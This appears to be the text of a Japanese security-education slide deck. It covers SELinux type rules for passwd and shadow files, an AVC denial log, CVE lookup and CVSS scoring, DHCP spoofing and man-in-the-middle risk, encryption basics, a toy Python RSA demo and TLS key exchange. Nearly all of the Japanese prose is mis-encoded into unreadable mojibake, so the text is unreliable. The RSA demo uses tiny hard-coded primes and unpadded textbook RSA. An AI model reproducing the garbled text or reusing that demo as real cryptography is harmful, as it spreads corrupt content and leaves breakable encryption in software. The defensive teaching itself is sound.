allow passwd_t device_t:dir { getattr ioctl lock open read search };
…
allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename
setattr unlink write };
…
allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read };
…
allow user_t passwd_exec_t:file { execute getattr open read };
allow user_t passwd_t:process transition;
…
ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β
passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ
passwd_tυϝΠϯ΁ͷભҠ͕ೝΊΒΕΔ
passwd_exec_tʹ
ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ
passwd_tʹભҠ͢Δ
passwd_tυϝΠϯͰ͸passwdΛ࣮ߦ͢Δͷʹඞཁͳ΋ͷ͔͠৮Εͳ͍
passwd_tͷϓϩηε͸
shadow_tλΠϓͷ
ύεϫʔυϑΝΠϧΛ৮ΕΔ

View Slide

passwd
ύεϫʔυϑΝΠϧ
ਖ਼نͷϩάΠϯखॱͰ
ೖ͖ͬͯͨϢʔβ
ύεϫʔυͱ
ؔ܎ͳ͍
ϑΝΠϧ
shadow_t΁ͷΞΫηεݖ͕ͳ͍
ແؔ܎ͳϑΝΠϧ΁ͷ
ΞΫηεݖ͕ͳ͍
passwd_tʹભҠ
Bob
ਖ਼نͷϩάΠϯखॱͰ
ೖͬͯ͜ͳ͔ͬͨϢʔβ
passwd_tʹ
ભҠ͢Δݖݶ͕ͳ͍
shadow_t΁ͷ
ΞΫηεݖ͕ͳ͍
BobʹͳΓ͢·͢߈ܸऀ
passwd_t͸shadow_tΛ৮ΕΔ

View Slide

SELinuxͷઃఆΛద੾ʹߦ͏ࣄͰ
߈ܸऀ͕ϓϩηεΛ৐ͬऔͬͨͱͯ͠΋
ͦͷӨڹΛ
͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ
ݶఆͰ͖Δ

View Slide

SELinux͕ΞΫηεΛڋ൱͢Δͱ
ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ
audit: type=1400 audit(1521959710.081:83): avc: denied
{ setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
ino=524679 scontext=staff_u:staff_r:staff_t
tcontext=system_u:object_r:shadow_t tclass=file
passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ
ίϚϯυchmod͕
shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ
ύʔϛογϣϯΛॻ͖׵͑Α͏ͱͨ͠ҝ
ڋ൱ͨ͠

View Slide

audit: type=1400 audit(1521959710.081:83): avc: denied
{ setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
ino=524679 scontext=staff_u:staff_r:staff_t
tcontext=system_u:object_r:shadow_t tclass=file
ιϑτ΢ΣΞʹ͜ͷૢ࡞Λ͢΂͖ਖ਼౰ͳཧ༝͕͋Δ৔߹
ͦͷιϑτ΢ΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏
ͦͷιϑτ΢ΣΞ͕ਖ਼ৗʹ࢖ΘΕΔͱ͖ʹ
ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏
ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏

View Slide

࣮ࡍͷSELinuxͷઃఆखॱ͸௕͘ͳΔͷͰׂѪ
ίϚϯυ΍ઃఆϑΝΠϧͷ࢖͍ํ͸
RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ
https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/
selinux_users_and_administrators_guide/
͜͜ʹ
3FE)BUͷ4&-JOVYϢʔβʔͱ؅ཧऀͷΨΠυΛషΔ

View Slide

RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ࢖͏৔߹
γεςϜͷϢʔβ΍λΠϓ໊ɺͦͷݖݶͷൣғ͕
ҟͳ͍ͬͯΔՄೳੑ͕͋Δ
࢖༻͢ΔσΟετϦϏϡʔγϣϯʹ
SELinuxʹؔ͢Δઆ໌͕͋Δ৔߹͸
ͦͪΒ΋ࢀর͢΂͠

View Slide

੬ऑੑ৘ใͷ௥͍ํ

View Slide

αʔό্Ͱಈ͍͍ͯΔͷ͕
ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ͚ͩ
ͱ͍͏έʔε͸كͰ͋Δ
ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
Χʔωϧ(OS)
υϥΠό υϥΠό
ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
ศརͳϥΠϒϥϦ

View Slide

ࣗ෼Ͱ࡞͍ͬͯͳ͍෦෼Ͱ੬ऑੑ͕ݟ͔ͭͬͯ
ࣗ෼ͷιϑτ΢ΣΞ͕҆શͰͳ͘ͳΔ͜ͱ͸Α͋͘Δ
ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
ศརͳ
ϥΠϒϥϦ
Χʔωϧ
υϥΠό υϥΠό
ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
ศརͳϥΠϒϥϦ

View Slide

ར༻͍ͯ͠Δ
Αͦͷιϑτ΢ΣΞͷ
੬ऑੑ৘ใΛؾʹ͔͚Α͏

View Slide

Common Vulnerabilities and Exposures
ڞ௨੬ऑੑࣝผࢠ ུͯ͠$7&

ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ
Ұҙͳ*%ΛׂΓ౰ͯͯσʔλϕʔεԽ͍ͯ͠Δ
http://www.cve.mitre.org/
͜͜ʹ
$7&ͷ8FCαΠτͷτοϓϖʔδΛషΔ

View Slide

BQBDIFͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ
http://www.cve.mitre.org/cve/search_cve_list.html
͜͜ʹ
$7&ͷ8FCαΠτͰBQBDIFͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ

View Slide

͜͜ʹ
$7&ͷ/*45ʹΑΔղઆΛషΔ
"QBDIFIUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ৔߹ʹ
ϦϞʔτ͔Βݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ
6TFBGUFSGSFF੬ऑੑͰ͋Γ
ඞͣ͠΋ݟ͑ͯ͸͍͚ͳ͍৘ใ͕ૹΒΕΔ༁Ͱ͸ͳ͍
https://nvd.nist.gov/vuln/detail/CVE-2017-9798

View Slide

Common Vulnerability Scoring System
ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS)
੬ऑੑͷϠό͞Λ਺஋ʹͨ͠΋ͷ
͜ΕΛݟΕ͹੬ऑੑͷ࢓૊Έ͕Θ͔Βͳͯ͘΋
Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ
͜͜ʹ
$7&ͷ$744ΛషΔ

View Slide

جຊධՁج४(Base Metrics)
੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
ݱঢ়ධՁج४ (Temporal Metrics)
੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
؀ڥධՁج४(Environmental Metrics)
੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ

View Slide

جຊධՁج४(Base Metrics)
੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
ݱঢ়ධՁج४ (Temporal Metrics)
੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
؀ڥධՁج४(Environmental Metrics)
੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ
͜͜ʹ
$7&ͷ$744ΛషΔ
࣌ͱ৔ॴʹґΒͳ͍جຊධՁج४ͷείΞ͕
੬ऑੑ৘ใͱͯ͠ެ։͞Ε͍ͯΔ

View Slide

جຊධՁج४ (Base Metrics)
߈ܸݩ۠෼(Access Vector)
߈ܸऀ͸Ͳ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔
ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ΋

߈ܸ৚݅ͷෳࡶ͞(Access Complexity)
߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͸೉͍͔͠
ಛผͳઃఆ͕࢖ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ஌͍ͬͯΔඞཁ͕͋Δ

ඞཁͳಛݖϨϕϧ(Privileges Required)
߈ܸΛߦ͏ʹ͸Ͳͷఔ౓ͷݖݶ͕ඞཁ͔
ҰൠϢʔβݖݶ͕ඞཁ ؅ཧऀݖݶ͕ඞཁ

View Slide

Ϣʔβؔ༩Ϩϕϧ(User Interaction)
߈ܸΛ੒ཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔
ࡉ޻Λͨ͠8FCϖʔδΛ։͔ͤΔඞཁ͕͋Δ

είʔϓ(Scope)
߈ܸΛड͚ͨίϯϙʔωϯτҎ֎΁ͷ߈ܸͷ଍͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔
ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘౰͢Δ

View Slide

׬શੑ΁ͷӨڹ(Integrity Impact)
߈ܸऀ͸ର৅ͷ৘ใΛվ᜵Ͱ͖Δ͔
վ᜵Ͱ͖Δ৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

Մ༻ੑ΁ͷӨڹ(Availability Impact)
߈ܸऀ͸αʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ׬શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ

ػີੑ΁ͷӨڹ(Confidentiality Impact)
߈ܸऀʹݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏͔
ݟ͑ͯ͠·͏৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

View Slide

͜͜ʹ
$7&ͷ$744ΛషΔ
Apach httpdͷ੬ऑੑCVE-2017-9798ͷ৔߹
ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
߈ܸ͸؆୯
߈ܸʹݖݶ͸ಛʹඞཁͳ͠
ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
ػີ৘ใ͕࿙ΕΔ
৘ใͷվ͟Μ͸Ͱ͖ͳ͍
Մ༻ੑΛଛͶΔ͜ͱ͸Ͱ͖ͳ͍
ۓٸ౓: 7.5/10.0 (ߴ)
݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏

View Slide

͜͜ʹ
$7&ͷ$744ΛషΔ
BINDͷ੬ऑੑCVE-2016-2776ͷ৔߹
ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
߈ܸ͸؆୯
߈ܸʹݖݶ͸ಛʹඞཁͳ͠
ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
৘ใ͸࿙Εͳ͍
৘ใͷվ͟Μ͸Ͱ͖ͳ͍
Մ༻ੑΛ׬શʹଛͶΔࣄ͕Ͱ͖Δ
ۓٸ౓: 7.5/10.0 (ߴ)
݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏

View Slide

͜͜ʹ
$7&ͷ$744ΛషΔ
Firefoxͷ੬ऑੑCVE-2016-5253ͷ৔߹
ϩʔΧϧ͔Β߈ܸͰ͖Δ
߈ܸ͸؆୯Ͱ͸ͳ͍
ҰൠϢʔβݖݶ͕ཁΔ
ϢʔβʹԿ͔ͤ͞Δඞཁ͸ͳ͠
৘ใ͸࿙Εͳ͍
ػີ৘ใͷվ͟Μ͕Ͱ͖Δ
Մ༻ੑΛଛͶΔࣄ͸Ͱ͖ͳ͍
ۓٸ౓: 4.7/10.0 (த)
੬ऑੑʹ͸ҧ͍ͳ͍͚ͲϠό͍΍ͭͰ͸ͳͦ͞͏

View Slide

͜͜ʹ
SFEIBUͷ੬ऑੑ৘ใͷϖʔδΛషΔ
ۓٸ౓ͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β
Ͳ͏͢Ε͹࠹͛Δ͔ʹؔ͢Δ৘ใ͕ग़Δ
https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776
͜͜ʹ
EFCJBOͷ੬ऑੑ৘ใͷϖʔδΛషΔ

View Slide

࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ
ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏
࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ
CVSSΛݟͯӨڹΛධՁ͠Α͏
σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍
੬ऑੑͷৄࡉΛݟͯ
໰୊ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏
σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ
ૣٸʹΞοϓσʔτ͠Α͏

View Slide

௨৴ʹର͢Δ߈ܸʹඋ͑Δ

View Slide

8J'J
Πϯλʔωοτ ઀ଓઌ
ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
Alice

View Slide

8J'J
֎ʹग़Δʹ͸
Ͳ͜ʹ௨৴Λ౤͛Ε͹
ྑ͍Ͱ͔͢
ͦΕ͸
DHCP DISCOVER
ѱҙ͋Δୈࡾऀ
ͬͪͩ͜Α
DHCP OFFER
Alice

View Slide

8J'J
ѱҙ͋Δୈࡾऀ
σʔλͷྲྀΕ
͜ͷΑ͏ͳ߈ܸ͸DHCPεϓʔϑΟϯάͱݺ͹ΕΔ
Alice

View Slide

ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͸͍͔ͭ͋͘Δ͕
઀ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ๷͙ज़͸ແ͍ͨΊ
ΠϯλʔωοτΛհͨ͠௨৴͸
ؒʹѱҙ͋Δୈࡾऀ͕͍Δ΋ͷͱͯ͠
௨৴Λߦ͏ඞཁ͕͋Δ

View Slide

Πϯλʔωοτ͸఻ݴήʔϜͩ
ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ͸
ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ
઀ଓઌ
ܦ༝ͨ͠ϗετͷ਺Λhop਺ͱݺͿ
1hop 2hop 3hop 4hop 5hop

View Slide

௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ͸
௨৴಺༰ؙ͕ݟ͑Ͱ͋Δ
઀ଓઌ

View Slide

௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
࣍ͷϗετʹਖ਼͘͠௨৴಺༰Λ఻͑ͳ͍͔΋͠Εͳ͍
઀ଓઌ

View Slide

௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢΋͠Εͳ͍
Bob
Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
Charlie
Alice

View Slide

ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
ӨڹΛड͚ͳ͍ͨΊʹ͸
௨৴಺༰Λ҉߸Խ
௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ

View Slide

ڞ௨伴҉߸
H e l l o , sp W o r l d ! nl
48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
m 8 can dc1 si vt n 9 n del : syn M f R +
ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b
H e l l o , sp W o r l d ! nl
48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
伴Λ࢖ͬͯม׵
伴Λ࢖ͬͯٯม׵
ͲͷΑ͏ʹม׵͢Δ͔ʹҧ͍͕͋Δ
ෳ਺ͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ

View Slide

ྑ͍ڞ௨伴҉߸ͱ͸
ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
શͯͷ伴Λࢼ͢ΑΓޮ཰ͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍
͜ΕΛূ໌͢Δͷ͕ࠔ೉
͜Ε͸伴Λ௕͘͢Ε͹࣮ݱͰ͖Δ

View Slide

ΞϧΰϦζϜ͕޿͘ར༻͞Ε͍ͯͯ
ͦΕͰ΋ޮ཰ͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸͸
গͳ͘ͱ΋ࠓͷͱ͜Ζ͸҆શͰ͋Δͱߟ͑ΒΕΔ
҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ
͜ͷ෦෼Λຬͨ͢ͷ͕ࠔ೉ʹͳΔ
∴҉߸ΞϧΰϦζϜͷࣗ࡞͸ΦεεϝͰ͖ͳ͍
্هͷ৚݅Λຬͨ͢
طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏

View Slide

ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
޿͘ར༻͞Ε͍ͯΔ͚Ͳ
ޮ཰ͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸
Advanced Encryption Standard (AES)
Blowfish
ͳͲͳͲ
ϒϩοΫ҉߸
ετϦʔϜ҉߸
Chacha20

View Slide

ڞ௨伴҉߸ͷ伴഑ૹ໰୊
҉߸Λ΍ΓऔΓ͢ΔͨΊʹ͸伴͕ඞཁ
͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ࢖͍ͬͯΔ৔߹
౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛ࢖ͬͯ૬खʹ伴Λ౉ͤͳ͍
ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ
҉߸ͷҙຯ͕ͳ͍ Bob
Alice

View Slide

௨৴಺༰Λ҉߸Խ
ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
NEW!

View Slide

ެ։伴҉߸
୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠΋
ͦͷ伴Ͱ௨৴಺༰Λ෮߸͢Δ͜ͱ͸Ͱ͖ͳ͍
෮߸͢Δͷʹඞཁͳ
ൿີ伴
͸ଞਓʹڭ͑ͳ͍
҉߸Խͱ෮߸ʹҟͳΔ伴Λ࢖͏҉߸ΞϧΰϦζϜ
҉߸Խʹඞཁͳ
ެ։伴
Λ௨৴૬खʹૹΔ
௨৴૬ख͸ެ։伴Λ࢖ͬͯ
伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ

View Slide

ެ։伴҉߸
=15
=-15 =42
=57
42+15=57
57-15=42
͜Μͳ҉߸ͩͱ
ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏
ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍

View Slide

RSA
ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍
373*61=22753Ͱ͋Δ͜ͱ͸؆୯ʹٻ·Δ͕
22753͕373ͱ61ʹ෼ղͰ͖Δ͜ͱΛ
ಉ͘͡Β͍؆୯ʹٻΊΔํ๏͸஌ΒΕ͍ͯͳ͍
ૉҼ਺෼ղ͕ඞཁ
͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ
ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ
๲େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ

View Slide

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def egcd( x, y, a = 0, b = 1 ):
div, mod = divmod( x, y )
if mod == 0:
return ( y, a )
return egcd( y, mod, b - div * a, a )
def modinv( x, y ):
a, b = egcd( x, y )
if a != 1:
raise Exception( 'no modinv')
return b % y
def generate_key_pair():
prime_nums = [ 116903, 215443, 139721 ]
public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
return ( public_key, private_key )
public_key, private_key = generate_key_pair();
print( 'ൿີ伴:\t%d' % private_key )
print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
plain = 0x686f6765
print( 'ݪจ:\t%X' % plain )
crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
print( '҉߸Խ:\t%X' % crypted )
decrypted = pow( crypted, private_key, public_key[ 0 ] )
print( '෮߸:\t%X' % decrypted )
$ ./crypto.py
ൿີ伴: 15753325457
ެ։伴: 25185933029,139721
ݪจ: 686F6765
҉߸Խ: 2779B8996
෮߸: 686F6765
RSA

View Slide

def egcd( x, y, a = 0, b = 1 ):
div, mod = divmod( x, y )
if mod == 0:
return ( y, a )
return egcd( y, mod, b - div * a, a )
def modinv( x, y ):
a, b = egcd( x, y )
if a != 1:
raise Exception( 'no modinv')
return b % y
def generate_key_pair():
prime_nums = [ 116903, 215443, 139721 ]
public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
return ( public_key, private_key )
public_key, private_key = generate_key_pair();
print( 'ൿີ伴:\t%d' % private_key )
print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
plain = 0x686f6765
print( 'ݪจ:\t%X' % plain )
crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
print( '҉߸Խ:\t%X' % crypted )
decrypted = pow( crypted, private_key, public_key[ 0 ] )
print( '෮߸:\t%X' % decrypted )
$ ./crypto.py
ൿີ伴: 15753325457
ެ։伴: 25185933029,139721
ݪจ: 686F6765
҉߸Խ: 2779B8996
෮߸: 686F6765
RSA
͋Δ੔਺nͱૉͳ1Ҏ্nະຬͷ
ࣗવ਺ͷ਺ΛٻΊΔؔ਺Λ
ΦΠϥʔͷτʔγΣϯτؔ਺φ(n)ͱݺͿ
ૉ਺ͷఆٛΑΓn͕ૉ਺ͷ৔߹φ(n)͸n-1ʹͳΔ
φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕஌ΒΕ͍ͯΔ
aͱbΛ஌͍ͬͯΔͱφ(ab)͸ఆ਺࣌ؒͰٻ·Δ͕
ab͔͠Θ͔Βͳ͍৔߹φ(ab)͸ࢦ਺࣌ؒΛཁ͢Δ
͜ͷඇରশੑΛ࢖ͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔ೉ʹ͢Δ

View Slide

ެ։伴ΛૉҼ਺෼ղ͢Ε͹ൿີ伴ʹͨͲΓண͚Δ
༰қͰ͸ͳ͍͕
૯౰ͨΓͰ伴Λ୳͢ΑΓ͸୹࣌ؒͰߦ͑ͯ͠·͏

View Slide

ૉҼ਺෼ղ͸େ͖ͳ਺ʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ
ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳ਺Λ伴ͱ͢Δ͜ͱͰ
ൿີ伴͕όϨΔͷΛ๷͙
RSAͷ৔߹伴௕768bitҎԼͷ΋ͷ͸
ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕஌ΒΕ͍ͯΔ
͜ͷΑ͏ͳݹ͍伴͸ΑΓ௕͍伴ʹߋ৽͠ͳ͚Ε͹ͳΒͳ͍
ެ։伴҉߸ͷ伴௕͸ૉҼ਺෼ղʹ͔͔Δ࣌ؒͰܾΊΔ

View Slide

Bob
Charlie
தؒऀ߈ܸ
ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ!
Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
௨৴૬ख͕ຊ෺Ͱ͋Δ͜ͱΛ͔֬Ίͳ͚Ε͹ͳΒ͍

View Slide

௨৴಺༰Λ҉߸Խ
௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ
NEW!

View Slide

Bob
ೝূہ
BobຊਓͰ͋Δ͜ͱΛ
෺ཧతͳํ๏Ͱ֬ೝͯ͠
ൿີ伴Λൃߦ
ެ։伴Λऔಘ
αʔόূ໌ॻ
ެ։伴Λ࢖ͬͯ҉߸Խͨ͠σʔλ͸
ຊ෺ͷBob͚͕ͩಡΊΔ
ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕
ଞਓͷखʹ౉ͬͯ͠·ͬͨ৔߹
ೝূہ͸ͦͷ伴Λࣦޮͤ͞Δ

View Slide

Transport Layer Security
ུͯ͠TLS ੲ͸SSLͱݺ͹Ε͍ͯͨ
͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨
RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮૷͕ଘࡏ͢Δ
࣌୅ͱͱ΋ʹ҆શͳ҉߸͸มΘΔͨΊTLS͸༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ
[1] https://www.ietf.org/rfc/rfc5246.txt
௨৴಺༰Λ҉߸Խ
௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ

View Slide

Transport Layer Security
෺ཧ૚
σʔλϦϯΫ૚
TCP/IP
௨৴Λߦ͏ΞϓϦέʔγϣϯ
TLS
TLSΛ࢖͏ΞϓϦέʔγϣϯ͸
TLSʹ௨৴σʔλΛ౉͢
TLS͸௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍
҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ
TCP/IPͷιέοτʹྲྀ͢
TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ
҉߸ʹؔ͢Δ໘౗ࣄΛ
ࣗ෼Ͱ࣮૷͢Δඞཁ͕ͳ͘ͳΔ

View Slide

RSAΛ༻͍ͨTLS
ެ։伴Λऔಘ
nΛެ։伴Ͱ҉߸Խͯ͠౉͢
͋Δཚ਺nΛ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
༗ޮͳެ։伴Ͱ҉߸Խͨ͠஋Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ͸
ڞ௨伴͸ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ
ຊ෺ͷ௨৴૬ख͸
ൿີ伴Ͱ
nΛऔΓग़ͤΔ
Bob
Alice

View Slide

RSAΛ༻͍ͨTLS
औಘ
͋Δཚ਺nΛ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
͜ͷ࣌ͷ௨৴Λه࿥͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ
͜ͷ࣌఺Ͱ͸ڞ௨伴҉߸ͷ伴΋ൿີ伴΋Θ͔Βͳ͍ͨΊ
ୈࡾऀ͸௨৴ͷ಺༰Λ஌Δ͜ͱ͕Ͱ͖ͳ͍
Bob
Alice

View Slide

͋Δཚ਺nΛ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ڞ௨伴҉߸Ͱ
҉߸Խ͞Εͨ௨৴
nΛ΋ͱʹ
ڞ௨伴Λ࡞Δ
ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
ڞ௨伴ΛऔΓग़ͯ͠
શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ
nΛ΋ͱʹ
